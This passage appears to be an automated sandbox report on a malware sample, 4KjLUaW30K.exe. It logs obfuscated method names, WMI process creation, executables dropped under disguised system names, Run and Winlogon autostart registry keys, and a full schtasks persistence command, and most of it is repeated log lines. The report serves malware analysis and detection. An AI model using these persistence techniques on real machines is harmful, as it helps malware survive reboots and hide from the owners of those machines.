Source: 4KjLUaW30K.exe, YmMbmIvAdsNpT2XQkN4.cs	High entropy of concatenated method names: 'GkJ8d8w40H', 'RwY8K4kiN0', 'gRO8WbkxrE', 'OHc81EAoOA', 'udd880VtOj', 'j1J8cxI9Na', 'dB88Uanel7', 'ip38MmV0DO', 'dqH8GPwq6f', 'CHp8aRgU97'
Source: 4KjLUaW30K.exe, k6mtCxV7NVUlG284iNa.cs	High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	File created: C:\Recovery\System.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	File created: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	File created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Jump to dropped file
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	File created: C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	File created: C:\Program Files (x86)\Windows Defender\dllhost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	File created: C:\Users\Public\Downloads\ShellExperienceHost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Jump to dropped file

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

File created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Recovery\System.exe'" /f

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp	Jump to behavior

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
